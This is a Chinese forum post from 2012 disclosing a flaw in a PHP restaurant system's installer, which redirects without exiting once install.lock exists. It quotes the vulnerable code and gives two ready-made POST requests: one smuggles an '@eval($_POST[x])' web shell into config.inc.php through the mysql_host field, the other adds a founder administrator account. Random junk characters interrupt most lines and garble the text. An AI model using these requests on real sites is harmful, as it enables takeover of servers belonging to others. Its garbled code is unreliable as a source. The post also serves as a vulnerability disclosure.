问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
, i5 O8 m8 s( z& L4 S% N, g0 {4 T1 z* r5 W- h5 U
<?php4 [9 y" e+ ]6 ?; l7 Y" O
if(file_exists("../install.lock"))
3 v" L% H. T' U- F" q8 N5 p{7 v, i2 P- P# f, \# S4 R r% ?
header("Location: ../");//没有退出
- [6 T) ^# F5 f( K, V! R}
; x% f; B4 L9 X0 ?0 F/ q - x0 Q5 g' F0 u7 @; S0 \" ]
//echo 'tst';exit;
! l9 `6 N7 q- W5 k+ P, s( D7 grequire_once("init.php");0 D" B8 F8 [4 W; T: f8 V# p
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
, x( u @" Q+ V/ [: U{
! A) E+ Z/ [% |可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
6 _3 _4 I' Q8 F! |0 h& H1 W( Z# o# P- |4 w) M
1、getshell(很危险)- E1 S& I$ {, Z$ T9 C/ S
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
. C9 Y$ ]. v: B. K" N+ E{5 j8 \6 _" r7 |5 v9 U$ E3 u
$smarty->assign("step",1);( ~ s8 A* T9 y1 Y) E5 i
$smarty->display("index.html");
& x: {# F6 ]. f- j- F: d6 i}elseif($_REQUEST['step']==2)3 [# D( I8 y8 T8 K4 C$ S
{
2 b& u7 V q3 Q, t5 e* D' ]0 T P $mysql_host=trim($_POST['mysql_host']);6 ] ~0 S& }& e% D g# Y& v. B# H5 p
$mysql_user=trim($_POST['mysql_user']);7 T. g7 _+ |7 P3 X, M7 ~
$mysql_pwd=trim($_POST['mysql_pwd']);* Z* f) L; n8 s# q% v1 S+ D2 d
$mysql_db=trim($_POST['mysql_db']);
/ l9 V6 \0 \% A' M6 \8 A $tblpre=trim($_POST['tblpre']);
$ M- S6 o8 ~! r Z $domain==trim($_POST['domain']);$ v( s% ~; o/ ~4 c% m
$str="<?php \r\n"; C, h0 q/ k# t+ t
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";9 T8 N; v6 `! s( h& O1 S5 o
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
$ X/ G0 k n: q/ R% L# X $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
' P. y5 `+ x* g' a% U) R $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";0 z8 V& Q% _# a# r6 p, @
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";2 _6 Y" S* l/ ?1 l' X- P8 r! B
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";4 D" Q0 h' o3 N# \# [% E8 D6 g: Q5 V: }
$str.='define("DOMAIN","'.$domain.'");'."\r\n";3 k# c5 @! @$ J* c1 d
$str.='define("SKINS","default");'."\r\n";5 a" s! k8 [) ^" ], N4 E
$str.='?>';" e2 m5 U' J. H# @7 t; ^$ y
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件+ {1 Y6 s% w" P4 I; b
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马) L5 Z0 X6 x3 J, J9 x6 Z% f
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
2 g d" a" u% `7 ?4 P: @! tHost: 192.168.80.129
7 q& P Y: Z; D- a+ K: _# v$ _3 _User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0+ v* S$ z& [8 w/ u) |$ _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8! N q8 n6 ^! u
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
" s5 t: T5 L2 S9 G0 p! P' \7 aAccept-Encoding: gzip, deflate
8 l, i8 Q9 o- W: x7 u9 R4 g$ C3 ?Referer: http://192.168.80.129/canting/install/index.php?step=15 r' Y* L0 U6 k8 S
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42! q) Y* d. Z# E: f# h+ V A# m
Content-Type: application/x-www-form-urlencoded. p3 u4 S* B* g: \& X7 N
Content-Length: 126
( P- r' R# A; ]! O 8 a( T% X" m$ c2 I9 @" L) v
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD. N" e3 b7 A- a( Q* [0 Q$ Q
但是这个方法很危险,将导致网站无法运行。0 e; w: k7 k* l, P. ^
. @7 p) ^3 w+ l, |/ {. W2、直接添加管理员: }7 C! Q h# I0 P
5 |6 o6 W+ e2 g# Felseif($_REQUEST['step']==5)
# x" U9 k5 W% Q1 ? I3 Z{, w* B; t6 e; e7 q: ^: n2 u
if($_POST)
% t3 J7 ]4 u, f) L% O9 m { require_once("../config/config.inc.php");
! ?/ Z2 q. I6 r7 G* I6 O5 g1 x $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);5 @+ y& Y$ b t- `/ q' N7 |9 p
mysql_select_db(MYSQL_DB,$link);
: I. I/ O* p6 j. `4 y! x mysql_query("SET NAMES ".MYSQL_CHARSET );( E, W u' N" a# |6 r
mysql_query("SET sql_mode=''");4 y, X% e" D3 o. X% J& N9 i
. y0 w2 _0 C7 A
$adminname=trim($_POST['adminname']);
0 `: ^ l/ x& `, X: d6 \ $pwd1=trim($_POST['pwd1']);2 T. o9 T$ I! F" v
$pwd2=trim($_POST['pwd2']);
9 g4 @/ i* D, J) z+ k# S if(empty($adminname))% e4 v6 R) P; p+ s$ c) U
{! g: K+ u% P6 J1 e+ j0 X: I( i
0 I% X; Z! S6 p" I3 I v' d% X C1 s5 ]
echo "<script>alert('管理员不能为空');history.go(-1);</script>";6 K& W' E& L+ p2 Q2 U* e
exit();
$ j4 B }; {1 a z2 W/ R }
# u" d# U) Z9 R! A! ~ if(($pwd1!=$pwd2) or empty($pwd1))
* q* h# z7 ~& S& w% o: A3 q {
4 d3 m2 c& R- T echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
! o& q. k+ \! V' z }
4 [( h' x# z2 } i( s( X% O mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
" j S; C- r c0 @ N( I+ Z+ m }. Y. J* u6 n, J8 n
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:; V7 m: e B; I) Y* R
POST /canting/install/index.php?m=index&step=5 HTTP/1.16 c0 b9 T% G( f8 o
Host: 192.168.80.1290 W2 ^/ F: {9 y) ], t$ z7 `9 d
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0! D) Z$ e& z$ E+ v: B, ?; P1 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# g9 ^! q8 K+ t* Y+ rAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
& p. @0 z; w* \$ y/ ~Accept-Encoding: gzip, deflate- G+ V1 u0 U# L" b m! l
Referer: http://www.2cto.com /canting/install/index.php?step=1
4 _6 ^( q1 t% ~( a+ ?Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42' B! \ A6 U" D. `, P6 U
Content-Type: application/x-www-form-urlencoded
8 ~9 P. C! _( N) wContent-Length: 46( q8 g9 u/ J# y& a$ G: l& o
4 w B* m7 e4 @% D0 R* n$ r/ F6 @
adminname=qingshen&pwd1=qingshen&pwd2=qingshen8 A' E R/ Y% p3 E, l( N" E* z' W
|
发表于 2012-12-4 11:13:44
收藏
支持
反对